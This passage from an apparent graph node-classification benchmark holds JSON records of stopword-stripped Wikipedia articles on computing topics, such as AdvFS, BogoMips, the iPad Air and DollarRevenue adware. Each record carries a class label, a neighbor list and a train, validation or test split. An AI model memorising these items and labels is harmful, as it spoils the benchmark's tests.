    "label": 4,
    "text": "Rick_Francona:rick francona lieutenant colonel rick francona born 31 august 1951 author commentator media military analyst retired united states air force intelligence officer experience middle east including tours duty national security agency defense intelligence agency central intelligence agency contract nbc news appeared regularly nbc msnbc cnbc well radio canada media 2013 became military analyst cnn francona served 27 years u.s. air force middle east fluent arabic served region national security agency defense intelligence agency central intelligence agency bachelor degree chapman college chapman university government arabic language master degree troy state university international relations concentration middle east studies cousin current cleveland indians manager terry francona francona wife emily also retired air force intelligence officer reside port orford oregon francona enlisted united states air force 1970 served vietnamese linguist 1973 conducting combat aerial reconnaissance missions vietnam laos variety strategic tactical aircraft arabic language training served variety locations middle east 1975 1977 supported evacuation u.s. embassy beirut lebanon 1976 1978 became arabic language instructor defense language institute monterey california following commissioning 1979 francona instructor air force intelligence school denver colorado 1982 1984 middle east operations officer national security agency united states overseas 1984 assigned advisor royal jordanian air force amman jordan 1987 assigned defense intelligence agency assistant defense intelligence officer middle east assignment spent much 1987 1988 u.s. embassy baghdad iraq liaison officer iraqi armed forces directorate military intelligence francona worked observer iraqi combat operations iranian forces flew sorties iraqi air force observations key discovery iraqi chemical weapons capabilities ballistic missile modifications immediately following iraqi invasion kuwait august 1990 gulf war francona deployed gulf interpreter advisor iraqi armed forces commander chief u.s. central command general norman schwarzkopf jr. lead interpreter ceasefire talks iraqi military safwan iraq march 1991 end gulf war francona served office secretary defense principal author department defense report congress conduct gulf war 1992 selected first air attaché u.s. embassy damascus syria returning united states 1995 1995 1996 francona served central intelligence agency participated variety sensitive operations middle east one operations survived attempt life iraqi intelligence service agents later awarded cia bronze seal medallion service cia 1996 selected lead development joint services counterterrorism intelligence branch direct result success creating special task force asked lead special operations team supporting nato forces bosnia late 1997 returned united states retired active duty 1998 decorations include defense distinguished service medal defense superior service medal bronze star nine air medals well campaign awards service vietnam persian gulf balkans francona awarded central intelligence agency seal medallion service agency 2006 francona inducted defense language institute hall fame francona media analyst middle east political-military events formerly contract nbc news appeared regularly nbc nightly news today show msnbc hardball chris matthews scarborough country countdown keith olbermann others also writes articles msnbc council foreign relations blog middle east perspectives frequently speaks conventions public service audiences 2010 francona appeared subject matter expert iraqi military saddam hussein episode spike tv deadliest warrior 2013 began working military analyst cnn commenting syrian civil war chemical warfare issues 2014 deteriorating situation iraq april 2008 documents obtained new york times reporter david barstow revealed francona recruited one 75 retired military officers involved pentagon military analyst program participants appeared television radio news shows military analysts and/or penned newspaper op/ed columns program launched early 2002 then-assistant secretary defense public affairs victoria clarke idea recruit key influentials help sell wary public possible iraq invasion",
    "neighbors": [
      7887
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10595,
    "label": 3,
    "text": "SPARCstation_LX:sparcstation lx sparcstation lx sun 4/30 workstation designed manufactured sold sun microsystems based sun4m architecture enclosed lunchbox chassis shares code name sunergy low-end range sparcclassic sparcclassic x sparcstation zx sparcstation zx sparcstation lx sun zx leo 24-bit color framebuffer sparcstation lx single 50 mhz microsparc processor three banks two dsimm slots official maximum configuration uses 16mb modules first bank also hold 32mb modules giving maximum 128mb memory hold one internal 50-pin single ended fast-narrow scsi drive floppy drive also supports external scsi devices ide/atapi support comes on-board amd lance ethernet chipset providing 10baset networking standard 10base2 10base5 via aui transceiver openboot rom able boot network using rarp tftp like sparcstation systems ssc holds system information mac address serial number nvram battery chip dies system able boot possible set mac address manually boot sparcstation lx accelerated cg6 framebuffer compared sparcclassic cg3 lx also features 16-bit audio opposed 8-bit audio sparcclassic motherboards two systems otherwise similar use chassis following operating systems run sparcstation lx",
    "neighbors": [
      9665,
      9955,
      10436,
      878,
      11440,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 10596,
    "label": 6,
    "text": "AdvFS:advfs advfs also known tru64 unix advanced file system file system developed late 1980s mid-1990s digital equipment corporation osf/1 version unix operating system later digital unix/tru64 unix june 2008 released free software gnu gplv2 license advfs used high-availability systems fast recovery downtime essential advfs uses relatively advanced concept storage pool called file domain logical file systems called file sets file domain composed number block devices could partitions lvm lsm devices file set logical file system created single file domain administrators add remove volumes active file domain providing enough space remaining file domain case removal one trickier original features implement data metadata residing disk removed first migrated online disks prior removal file sets balanced meaning file content file sets balanced across physical volumes particular files file set striped across available volumes administrators take snapshot clone active inactive file set allows easy on-line backups another feature allows administrators add remove block devices file domain file domain active users add/remove feature allows migration larger devices migration potentially failing hardware without system shutdown features include linux advfs supports additional ‘ ’ syncv ’ ’ system call atomically commit changes multiple files advfs also known tru64 unix advanced file system developed digital equipment corporation engineers late 1980s mid-1990s bellevue wa decwest previously worked earlier cancelled mica ozix projects first delivered dec osf/1 system later digital unix/tru64 unix time development moved teams located bellevue wa nashua nh versions always one version number behind operating system version thus dec osf/1 v3.2 advfs v2.x digital unix 4.0 advfs v3.x tru64 unix 5.x advfs v4.x generally considered advfs v4 matured production level stability sufficient set tools get administrators kind trouble original team enough confidence log based recovery release without fsck style recovery utility assumption file system journal would always allocated mirrored drives 1996 lee thekkath described use advfs top novel disk virtualisation layer known petal later paper thekkath et al describe file system frangapani built top petal compare performance advfs running storage layer shapiro miller compared performance files stored advfs oracle rdbms version 7.3.4 blob storage compaq sierra parallel file system pfs created cluster file system based multiple local advfs filesystems testing carried lawrence livermore national laboratory llnl 2000–2001 found underlying advfs filesystem adequate performance albeit high cpu utilisation pfs clustering layer top performed poorly june 23 2008 source code released hewlett-packard gnu general public license version 2 instead recently released gplv3 sourceforge order compatible also gplv2 licensed linux kernel license",
    "neighbors": [
      5120,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      9249,
      9762,
      5158,
      7225,
      11323,
      8772,
      1109,
      2135,
      4708,
      9836,
      7789,
      9333,
      6263,
      9335,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      3265,
      10951,
      9420,
      6352,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      6365,
      739,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      5384,
      2314,
      8461,
      6416,
      1810,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      4907,
      9004,
      302,
      7983,
      6961,
      6963,
      1844,
      6970,
      11072,
      3909,
      2378,
      4431,
      5969,
      4438,
      346,
      2395,
      2397,
      2407,
      10087,
      5492,
      11638,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      7565,
      6545,
      5013,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      8114,
      7603,
      8631,
      1464,
      1978,
      8643,
      7126,
      2015,
      1509,
      9189,
      7663,
      11256,
      2555,
      3582
    ],
    "mask": "None"
  },
  {
    "node_id": 10597,
    "label": 7,
    "text": "Univa_Grid_Engine:univa grid engine univa grid engine batch-queuing system forked sun grid engine sge software schedules resources data center applies policy management tools product deployed run on-premises using cloud computing hybrid cloud environment roots grid engine commercial product date back 1993 names codine later variation product grd comprehensive genealogy product described sun grid engine grid engine first distributed genias software 1999 company merger gridware inc 2000 sun microsystems acquired gridware sun renamed codine/grd sun grid engine later year released open-source 2001 2010 oracle corporation acquired sun thus renamed sge oracle grid engine oracle grid engine 6.2u6 source code included binaries changes put back project source repository response grid engine community started open grid scheduler son grid engine projects continue develop maintain free implementation grid engine january 18 2011 univa announced hired principal engineers sun grid engine team univa grid engine development led cto fritz ferstl founded grid engine project ran business within sun/oracle past 10 years october 22 2013 univa announced acquired oracle grid engine assets intellectual property making sole commercial provider grid engine software june 24 2018 univa announced massive scalability operating single cluster 1 million cores aws univa grid engine 8.0 first version released april 12 2011 forked sge 6.2u5 last open source release adds improved third party application integration license policy management enhanced support software hardware platforms cloud management tools univa grid engine 8.0.1 released october 4 2011 adds improved support multi-core hardware integration nvidia gpus new job submission verifier extensions additional bug fixes univa grid engine 8.1.0 announced may 2 updated latest release level 8.1.3 nov 15 2012 8.1.x releases deliver important new functionality job classes postgres spooling resource maps fair urgency deterministic wildcard pe selection improved diagnostics pre-configured mpi integations improved apache hadoop integration well many bug fixes performance improvements univa grid engine 8.1.6 announced oct 14 2013 update include improvements grid engine scheduler larger clusters qmaster stability improvements spooling qalter commands univa grid engine 8.2.0 released sept 02 2014 new univa grid engine version 8.2 includes native windows support univa grid engine 8.3.0 released june 22 2015 new preemption feature univa grid engine 8.3.0 allows users set priorities different work higher priority application must use resources currently allocated lower priority application lower priority application effectively “ paused ” —not lost—and work automatically resume higher priority application completed among handful new features added grid engine 8.3.0 improve overall reliability efficiency cluster new run time modification resources feature run time modification resources feature means much efficient use cluster resources univa grid engine 8.3.1 released august 28 2015 release contained new features univa grid engine 8.3.0 additional fixes enhancements identified since release 8.3.0 univa grid engine 8.4.0 released may 31 2016 release supports docker containers automatically dispatch run jobs user specified docker image univa grid engine 8.5.0 released march 7 2017 release univa grid engine 2x faster open source grid engine 6.2u5 grid engine 8.5.0 also includes significant improvement docker support including mobility gpu apps within cluster 8.6.0 released july 17 2018 univa grid engine supports nvidia docker 2.0 new univa grid engine docker integration allows flexibility running docker containers univa grid engine environment univa grid engine 8.6.1 released august 8 2018 providing improved control gpu devices new affinity features allowing jobs gravitate towards away certain compute nodes 8.6.2 released august 16 2018 univa grid engine performance scalability improved several key areas network communications job submission memory allocation scheduler optimizations update also improved univa grid engine job dispatch information 8.6.3 released september 27 2018 new update provided bulk configuration changes univa grid engine hosts new bulk configuration commands perform operations many hosts simultaneously makes easier manage large univa grid engine cluster 8.6.4 released november 23 2018 providing new core binding strategies make easier distribute nodes cores jobs also providing flexibility new affinity-based job placement policy included update jobs submitted using affinity either packed close together “ positive affinity ” “ negative affinity ” across cluster based resources requested new univa grid engine resource maps control access host devices nvidia gpus allows jobs request gpus gpu exclusively assigned job univa grid engine also directly communicates nvidia data center gpu manager collect gpu metrics scheduling accounting univa grid engine 8.6.5 released may 6 2019 new key features 8.6.7 released august 5 2019 among numerous enhancements univa grid engine 8.6.7 offers red hat linux 8 support nvidia gpu dcgm job usage",
    "neighbors": [
      9665,
      4194,
      9602,
      5956,
      8702,
      330,
      1995,
      5612,
      3055,
      7248,
      7983,
      2710,
      3449,
      2910
    ],
    "mask": "None"
  },
  {
    "node_id": 10598,
    "label": 4,
    "text": "DollarRevenue:dollarrevenue dollarrevenue adware program made company name displays advertisements infected pc installs ucmore toolbar track internet searches usually comes bundled another program december 2007 dutch government agency opta fined two unnamed individuals three companies eur 1 million infecting 22 million computers worldwide june 2013 dutch corporate appeals court cbb overturned around eur 1 million worth fines imposed opta dollarrevenue cbb said opta adequately establish happened infected pcs",
    "neighbors": [
      7515,
      877
    ],
    "mask": "Test"
  },
  {
    "node_id": 10599,
    "label": 2,
    "text": "Series_80_(software_platform):series 80 software platform series 80 formerly crystal short-lived mobile software platform enterprise professional level smartphones made nokia introduced 2000 uses symbian os common physical properties symbian os user interface type screen resolution 640×200 pixels full qwerty keyboard series 80 used large size communicator screens best effect needed separate development relatively small market nokia 9300i announced 2005 final series 80 device nokia use series 80 platform final communicator nokia e90",
    "neighbors": [
      1537,
      10754,
      11271,
      529,
      3089,
      10770,
      5143,
      2072,
      5659,
      4132,
      40,
      3626,
      9262,
      7727,
      10802,
      7220,
      5175,
      9784,
      1083,
      9292,
      7246,
      1615,
      5201,
      7253,
      3162,
      5211,
      6748,
      607,
      1633,
      2658,
      6763,
      109,
      8316,
      8829,
      11391,
      6276,
      3205,
      9359,
      1687,
      10393,
      5274,
      669,
      6301,
      673,
      6310,
      167,
      5290,
      10410,
      7857,
      7866,
      1216,
      1728,
      5824,
      4291,
      7877,
      199,
      4305,
      2259,
      6870,
      9443,
      3300,
      4324,
      7399,
      8423,
      8433,
      5369,
      8472,
      11545,
      5406,
      4383,
      7983,
      821,
      7991,
      7492,
      10053,
      11079,
      6996,
      854,
      10583,
      10080,
      6505,
      6508,
      2925,
      5998,
      8577,
      11655,
      8584,
      1424,
      2449,
      8083,
      7063,
      5019,
      4003,
      7617,
      967,
      2001,
      10215,
      3561,
      495,
      1524,
      1533
    ],
    "mask": "None"
  },
  {
    "node_id": 10600,
    "label": 4,
    "text": "Federal_Office_for_Information_Security:federal office information security federal office information security abbreviated bsi german upper-level federal agency charge managing computer communication security german government areas expertise responsibility include security computer applications critical infrastructure protection internet security cryptography counter eavesdropping certification security products accreditation security test laboratories located bonn 600 employees current president since 1 february 2016 former business executive arne schönbohm took presidency michael hange bsi predecessor cryptographic department germany foreign intelligence agency bnd bsi still designs cryptographic algorithms libelle cipher initiated development gpg4win cryptographic suite bsi similar role unlike organizations bsi focused it-security rather part organisation general it-standards remit bsi separate germany signals intelligence part military foreign intelligence service bnd december 2018 arne schönbohm stated bsi yet seen evidence chinese telecommunications company huawei used equipment conduct espionage behalf china",
    "neighbors": [
      9375,
      5693,
      3941,
      8904,
      5353,
      11368,
      880,
      11088,
      4083,
      5373,
      4379,
      10303,
      4957,
      2558,
      383
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10601,
    "label": 3,
    "text": "BogoMips:bogomips bogomips bogus mips unscientific measurement cpu speed made linux kernel boots calibrate internal busy-loop often-quoted definition term number million times per second processor absolutely nothing bogomips value used verify whether processor question proper range similar processors i.e bogomips represents processor clock frequency well potentially present cpu cache usable performance comparisons among different cpus 1993 lars wirzenius posted usenet message explaining reasons introduction linux kernel comp.os.linux approximate guide bogomips pre-calculated following table given rating typical cpu current applicable linux version index ratio bogomips per clock speed cpu intel 386dx cpu comparison purposes source complete list refer bogomips mini-howto 2.2.14 linux kernel caching setting cpu state moved behind bogomips calculation although bogomips algorithm n't changed kernel onward bogomips rating current pentium cpus twice rating change changed bogomips outcome effect real processor performance linux command visualization bogomips cat /proc/cpuinfo kernel 2.6.x bogomips implemented codice_1 kernel source file computes linux kernel timing parameter codice_2 see jiffy value explanation source code codice_2 used implement codice_4 delay microseconds codice_5 delay nanoseconds functions functions needed drivers wait hardware note busy waiting technique used kernel effectively blocked executing codice_5/codice_4 functions i386 architecture codice_8 implemented codice_9 equivalent following assembler code rewritten c-pseudocode full complete information details bogomips hundreds reference entries found outdated bogomips mini-howto 2012 arm contributed new codice_4 implementation allowing system timer built many armv7 cpus used instead busy-wait loop implementation released version 3.6 linux kernel timer-based delays robust systems use frequency scaling dynamically adjust processor speed runtime codice_11 values may necessarily scale linearly also since timer frequency known advance calibration needed boot time one side effect change bogomips value reflect timer frequency cpu core frequency typically timer frequency much lower processor maximum frequency users may surprised see unusually low bogomips value comparing systems use traditional busy-wait loops",
    "neighbors": [
      7299,
      3462,
      6151,
      7302,
      7305,
      8711,
      7313,
      5523,
      2070,
      3350,
      7836,
      2081,
      10658,
      3882,
      3883,
      10548,
      1461,
      823,
      1849,
      6352,
      10966,
      4569,
      9964,
      1005,
      3565,
      10734,
      1776,
      4465,
      499,
      1911,
      3323,
      8700,
      1399
    ],
    "mask": "Test"
  },
  {
    "node_id": 10602,
    "label": 8,
    "text": "Topsy_Labs:topsy labs topsy labs social search analytics company based san francisco california company certified twitter partner maintained comprehensive index tweets numbering hundreds billions dating back twitter inception 2006 topsy made products search analyze draw insights conversations trends public social websites including twitter google+ company acquired apple inc. december 2013 shut december 16 2015 topsy founded 2007 vipul ved prakash rishab aiyer ghosh gary iwatani justin foutts company raised usd 27 million venture capital bluerun ventures ignition partners founders fund scott banister investors company 40 employees offices san francisco washington dc operating data centers december 2013 topsy acquired apple inc. reported value around 225 million december 16 2015 topsy service shut website redirected apple support page discussing search functionality ios 9 topsy.com real-time search engine social posts socially shared content primarily twitter google plus service ranked results using proprietary social influence algorithm measured social media authors much others supported saying service also provided access metrics term mentioned twitter via free analytic service analytics.topsy.com users could compare three terms content past hour day week month announced september 2013 topsy would include every public tweet ever published twitter search analysis topsy pro analytics commercial web dashboard application allowed users conduct interactive analysis keywords authors activity influence exposure sentiment language geography users could discover relevant tweets links photos videos term topsy ’ index hundreds billions tweets users able group terms saved topics setup customized alerts daily activity digests topsy pro analytics version topsy pro analytics product government agencies intended purpose product facilitate disaster response quantify political issues detect disease outbreak monitor global anomalies topsy provided set rest apis programmatically access twitter data metrics users could also access data via ad-hoc report requests index co-developed twitter topsy debuted august 2012 originally compared social sentiment two primary american presidential candidates index also co-developed twitter topsy debuted january 2013 originally compared social sentiment films nominated academy awards six categories best picture best actor best actress best supporting actor best supporting actress best director topsy sentiment analysis used index correctly predicted five six award recipients march 2013 mashable topsy co-produced mashable sxsw trendspotter mobile-enabled website visitors could see trending sxsw event based real-time analysis twitter conversations sxsw trendspotter provided analysis",
    "neighbors": [
      10755,
      9732,
      1549,
      7697,
      11289,
      6186,
      6700,
      1074,
      9784,
      8253,
      576,
      8783,
      4180,
      10838,
      9826,
      5733,
      8806,
      3691,
      2676,
      6264,
      7806,
      2686,
      6783,
      10878,
      8842,
      5784,
      1177,
      4251,
      2207,
      11430,
      171,
      2735,
      3248,
      4283,
      7869,
      7359,
      9922,
      713,
      3790,
      7378,
      3286,
      9430,
      3293,
      4318,
      231,
      2282,
      1772,
      4844,
      8441,
      2819,
      1290,
      9999,
      784,
      4888,
      10023,
      4399,
      2363,
      2365,
      2366,
      9022,
      1346,
      10562,
      838,
      10059,
      2388,
      6495,
      9063,
      3948,
      11629,
      10608,
      6023,
      6539,
      1428,
      3483,
      3485,
      2979,
      9123,
      11173,
      8109,
      2492,
      446,
      7614,
      2502,
      456,
      1482,
      464,
      5072,
      6608,
      8662,
      9174,
      7133,
      9182,
      4068,
      5093,
      2023,
      8170,
      7154,
      5619,
      11257,
      6654
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10603,
    "label": 3,
    "text": "Modified_Harvard_architecture:modified harvard architecture modified harvard architecture variation harvard computer architecture unlike pure harvard architecture allows contents instruction memory accessed data modern computers documented harvard architecture fact modified harvard architecture original harvard architecture computer harvard mark employed entirely separate memory systems store instructions data cpu fetched next instruction loaded stored data simultaneously independently contrast von neumann architecture computer instructions data stored memory system without complexity cpu cache must accessed turn physical separation instruction data memory sometimes held distinguishing feature modern harvard architecture computers microcontrollers entire computer systems integrated onto single chips use different memory technologies instructions e.g flash memory data typically read/write memory von neumann machines becoming popular true distinction harvard machine instruction data memory occupy different address spaces words memory address uniquely identify storage location von neumann machine also necessary know memory space instruction data address belongs computer von neumann architecture advantage pure harvard machines code also accessed treated data vice versa allows example data read disk storage memory executed code self-optimizing software systems using technologies just-in-time compilation write machine code memory later execute another example self-modifying code allows program modify disadvantage methods issues executable space protection increase risks malware software defects addition systems notoriously difficult document code flow also make debugging much difficult accordingly pure harvard machines specialty products modern computers instead implement modified harvard architecture modifications various ways loosen strict separation code data still supporting higher performance concurrent data instruction access harvard architecture common modification builds memory hierarchy cpu cache separating instructions data unifies except small portions data instruction address spaces providing von neumann model programmers never need aware fact processor core implements modified harvard architecture although benefit speed advantages programmers write instructions data memory need aware issues cache coherency another change preserves separate address space nature harvard machine provides special machine operations access contents instruction memory data data directly executable instructions machines always viewed modified harvard architecture harvard architecture processors maxq execute instructions fetched memory segment – unlike original harvard processor execute instructions fetched program memory segment processors like harvard architecture processors – unlike pure von neumann architecture – read instruction read data value simultaneously 're separate memory segments since processor least two separate memory segments independent data buses obvious programmer-visible difference kind modified harvard architecture pure von neumann architecture – executing instruction one memory segment – memory segment simultaneously accessed data three characteristics may used distinguish modified harvard machines pure harvard von neumann machines pure harvard machines address zero instruction space refers instruction storage location separate address zero data space refers distinct data storage location contrast von neumann split-cache modified harvard machines store instructions data single address space address zero refers one location whether binary pattern location interpreted instruction data defined program written however like pure harvard machines instruction-memory-as-data modified harvard machines separate address spaces separate addresses zero instruction data space therefore distinguish type modified harvard machines pure harvard machines point pure modified harvard machines co-exist flexible general von neumann architecture separate memory pathways cpu allow instructions fetched data accessed time improving throughput pure harvard machines separate pathways separate address spaces split-cache modified harvard machines separate access paths cpu caches tightly coupled memories unified address space covers rest memory hierarchy von neumann processor unified address space programmer point view modified harvard processor instruction data memories share address space usually treated von neumann machine cache coherency becomes issue self-modifying code program loading confusing issues usually visible systems programmers integrators modified harvard machines like pure harvard machines regard original harvard machine mark stored instructions punched paper tape data electro-mechanical counters however entirely due limitations technology available time today harvard machine pic microcontroller might use 12-bit wide flash memory instructions 8-bit wide sram data contrast von neumann microcontroller arm7tdmi modified harvard arm9 core necessarily provides uniform access flash memory sram 8 bit bytes cases outside applications cacheless dsp microcontroller required modern processors cpu cache partitions instruction data also processors harvard machines rigorous definition program data memory occupy different address spaces modified weak sense operations read and/or write program memory data example lpm load program memory spm store program memory instructions atmel avr implement modification similar solutions found microcontrollers pic z8encore many families digital signal processors ti c55x cores instruction execution still restricted program address space processors unlike von neumann machines separate address spaces creates certain difficulties programming high-level languages directly support notion tables read-only data might different address space normal writable data thus need read using different instructions c programming language support multiple address spaces either non-standard extensions standardized extensions support embedded processors",
    "neighbors": [
      7173,
      9739,
      2066,
      7699,
      5655,
      10779,
      10781,
      6181,
      8231,
      2605,
      3630,
      6705,
      7218,
      8761,
      2623,
      2113,
      7234,
      3142,
      2638,
      1122,
      3175,
      8815,
      630,
      8822,
      6268,
      3197,
      7313,
      6815,
      8352,
      5793,
      6818,
      6821,
      682,
      7852,
      9391,
      2224,
      2226,
      7858,
      9911,
      8890,
      4286,
      2241,
      2243,
      9932,
      5329,
      10966,
      731,
      11487,
      7911,
      10985,
      9964,
      5358,
      1776,
      8944,
      757,
      2805,
      10485,
      249,
      8700,
      7421,
      1798,
      1801,
      6926,
      6415,
      1298,
      11539,
      7445,
      1820,
      1826,
      2339,
      6950,
      3886,
      309,
      8501,
      5948,
      4928,
      8514,
      4423,
      6476,
      7505,
      9044,
      11604,
      344,
      7515,
      8543,
      1376,
      4450,
      4465,
      10612,
      1399,
      7033,
      1402,
      3457,
      8581,
      398,
      3470,
      5518,
      5523,
      407,
      409,
      8609,
      10658,
      9126,
      9638,
      10669,
      1967,
      2480,
      10675,
      1461,
      1463,
      7607,
      4030,
      453,
      3014,
      466,
      4569,
      1499,
      1502,
      5598,
      7134,
      5090,
      995,
      7653,
      9707,
      10734,
      6639,
      499,
      4596,
      10746,
      508
    ],
    "mask": "None"
  },
  {
    "node_id": 10604,
    "label": 8,
    "text": "Web_counter:web counter web counter hit counter computer software program indicates number visitors hits particular webpage received set counters incremented one every time web page accessed web browser number usually displayed inline digital image plain text image rendering digits may use variety fonts styles classic example wheels odometer counter often accompanied date set last reset without becomes impossible estimate within time number page loads counted occurred web counters simply web bugs used webmasters track hits included visible on-page elements counters popular 1990s later replaced web traffic measures self-hosted scripts like analog later remote systems used javascript like google analytics systems typically include on-page elements displaying count thus seeing web counter modern web page one example retrocomputing internet one seo spamming technique companies pay site listed html code free hit counter thus user puts page small link appear bottom quick way sites accumulate inbound links often performed sites competitive web fields like online gambling 2008 google removed number high-ranking mesothelioma sites using counters top results",
    "neighbors": [
      6273,
      3462,
      2312,
      3401,
      3688,
      6576,
      5524,
      4917,
      4797,
      8639
    ],
    "mask": "Test"
  },
  {
    "node_id": 10605,
    "label": 3,
    "text": "Pumpkin_Adventure_III:_The_Hunt_for_the_Unknown:pumpkin adventure iii hunt unknown pumpkin adventure iii hunt unknown video game msx created umax released 1995 sunrise foundation role-playing game turn-based fighting system los angeles attack strange creatures nobody knows creatures sent last hope l.a. government sets special police team s.o.d.o.m even s.o.d.o.m able stop threat last resort brilliant professor steinein uses time machine find brave people history people steve damien bishop stopped lucifer taking world pumpkin adventure 2 three together s.o.d.o.m member jeff tates start quest find source creatures destroy",
    "neighbors": [
      10931,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 10606,
    "label": 3,
    "text": "Gdium:gdium gdium subnotebook netbook computer produced emtec gdium product distinguished unique loongson mips processor use usb key primary storage device gdium netbook marketed interface device gdium learning community —a website provides hardware support mips builds open-source software linux computing tips educational resources targeted towards teachers students within k-12 demographic emtec gdium liberty 1000 built stmicroelectronics loongson 2f mips microprocessor uses proprietary form-factored usb key called g-key primary storage medium g-key fits specially designed usb slot recessed within unit available 8gb 16gb capacities key generates noise less susceptible mechanical shock damage hard drives also includes sd card reader provides support mmc sd sdhc cards supplemental storage gdium uses mandriva sole operating system boots approximately 30 seconds desktop uses metacity window manager lxplanel idesk-based interface like modern linux distributions open-source software applications openoffice.org mozilla firefox thunderbird gimp included default installation compilations microsoft windows os x ubuntu available mips architecture e.g debian offers packages compiled mips emtec gdium liberty 1000 specifications follows website went around sept 2013 unsure community still alive elsewhere",
    "neighbors": [
      1537,
      3585,
      7938,
      2308,
      6797,
      11405,
      1682,
      405,
      11418,
      5019,
      1952,
      6178,
      7983,
      5681,
      9266,
      823,
      1849,
      1728,
      7234,
      10820,
      11337,
      10192,
      5339,
      2784,
      3300,
      2285,
      2420,
      9851,
      10109
    ],
    "mask": "None"
  },
  {
    "node_id": 10607,
    "label": 9,
    "text": "Inductive_data_type:inductive data type inductive data type may refer",
    "neighbors": [],
    "mask": "Train"
  },
  {
    "node_id": 10608,
    "label": 2,
    "text": "IPad_Air:ipad air ipad air first-generation ipad air tablet computer designed developed marketed apple inc announced october 22 2013 released november 1 2013 ipad air features thinner design similarities contemporaneous ipad mini 2 64-bit apple a7 processor m7 coprocessor discontinued launch 9.7 inch ipad pro march 21 2016 successor ipad air 2 announced october 16 2014 sold discontinuation march 21 2017 ipad air name brought back announcement third-generation ipad air march 18 2019 june 3 2019 apple announced ipados supporting ipad air first generation stay ios 12 ipad air announced keynote yerba buena center arts october 22 2013 keynote named 'we still lot cover ipad air came ios 7 operating system released september 18 2013 jonathan ive designer ios 7 new elements described update bringing order complexity highlighting features refined typography new icons translucency layering physics gyroscope-driven parallaxing major changes design design ios 7 os x mavericks version 10.9 noticeably depart skeuomorphic elements green felt game center wood newsstand leather calendar favor flat colourful design act hotspot carriers sharing internet connection wi-fi bluetooth usb also access apple app store digital application distribution platform ios service allows users browse download applications itunes store developed xcode ios sdk published apple app store garageband imovie iphoto iwork apps pages keynote numbers available ipad air comes several applications including siri safari mail photos video music itunes app store maps notes calendar game center photo booth contacts like ios devices ipad sync content data mac pc using itunes although ios 5 later managed backed without computer although tablet designed make phone calls cellular network users use headset built-in speakers microphone place phone calls wi-fi cellular using voip application skype device dictation application using voice recognition technology iphone 4s enables users speak ipad types say screen though ipad must internet connection via wi-fi cellular network speech processed apple servers apple also began giving away popular ilife iphoto imovie garageband iwork pages keynote numbers apps device june 8 2015 announced wwdc ipad air would support ios 9 new features released q3 2015 air users ios 9 able take advantage two features called slide picture picture slide allows user slide second app side screen smaller window display information alongside initial app picture picture allows user watch video small resizable moveable window remaining another app another feature dubbed split view allows user run two apps simultaneously 50/50 view supported air instead run ipad air 2 announced wwdc 2016 ipad air along various ios devices support ios 10 announced wwdc 2017 ipad air support latest version ios ios 11 dropping support immediate predecessor 4th generation ipad apple announced ipad air together apple a7 powered devices support ios 12 update making ipad air one longest supported ios device support six major versions ios ios 7 way ios 12 june 2019 apple announced drop support ipad air release ipados ipad air marks first major design change ipad since ipad 2 thinner design 7.5 millimeters thick smaller screen bezel similar ipad mini apple reduced overall volume ipad air using thinner components resulting 22 reduction weight ipad 2 though still uses 9.7-inch retina display previous ipad model improved front-facing camera makes using facetime much clearer new front-facing camera capable video 720p hd includes face detection backside illumination rear camera received upgrade well called isight camera addition functions front camera also contains 5mp cmos hybrid ir filter fixed ƒ/2.4 aperture device available space gray silver colors previous generations apple continued use recyclable materials enclosure ipad air milled solid block aluminum making 100 recyclable ipad air also free harmful materials bfrs pvc although air inherits hardware components iphone 5s 64-bit apple a7 system-on-chip apple m7 motion processor uses home button built previous ipad models therefore support touch id fingerprint sensor a7 present ipad air slightly different however use pop design stacks ram top soc also features metal heat spreader compensate slightly faster clock speed better thermal management air also includes 5 megapixel rear-facing camera isight facetime hd front-facing camera support 802.11n estimated 10 hours battery life boots faster previous ipad model previous generations iphone ipad hardware four buttons one switch ipad air device portrait orientation home button face device display returns user home screen wake/sleep button top edge device two buttons upper right side device performing volume up/down functions switch whose function varies according device settings functioning either switch device silent mode lock/unlock orientation screen addition wifi version weighs 469 grams cellular model weighs 478 grams – 25 lighter respective predecessors display responds sensors ambient light sensor adjust screen brightness 3-axis accelerometer sense orientation switch portrait landscape modes unlike iphone ipod touch built-in applications work three orientations portrait landscape-left landscape-right ipad built-in applications support screen rotation four orientations including upside-down consequently device intrinsic native orientation relative position home button changes ipad air available 16 32 64 128 gb internal flash memory expansion option apple also sells camera connection kit sd card reader used transfer photos videos announcement ipad pro 9.7-inch march 21 2016 ipad air discontinued models connect wireless lan offer dual band wi-fi support tablet also manufactured either without capability communicate cellular network ipad air ipad mini 2 cellular model comes two variants support nano-sims quad-band gsm penta-band umts dual-band cdma ev-do rev b. additionally one variant also supports lte bands 1-5 7 8 13 17-20 25 26 variant supports lte bands 1-3 5 7 8 18-20 td-lte bands 38 39 40 apple ability handle many different bands one device allowed offer first time single ipad variant supports cellular bands technologies deployed major north american wireless providers time device introduction audio playback ipad air stereo two speakers located either side lightning connector ipad air received mainly positive reviews writing anandtech anand lal shimpi writes ipad air feels like true successor ipad 4 praising reduced weight size shimpi states air hits balance features design ergonomics n't think 've ever seen ipad uk editor-in-chief techradar patrick goss gave ipad air positive review giving praise a7 chip camera upgrades well crisp colorful display concludes stating hard put words much apple improved ipad offering stunning level detail power build quality unrivalled christina bonnington wired awarded air rating 8 10 calling performance outstanding noting high-definition video streams gaming animations smooth stutter free also praised loading speeds safari web browser bonnington criticized speakers slightly muddled apple inc. co-founder steve wozniak criticized focus decreasing size weight rather increasing storage space stated want ipad air fit personal needs dave smith international business times wrote two less positive reviews air arguing device nice bring anything new ipad smith strongly criticized lack touch id noted updates increased speed decreased size weight slight improvements launch date ipad air see large turnout usual apple products however expected analysts due delayed release ipad mini 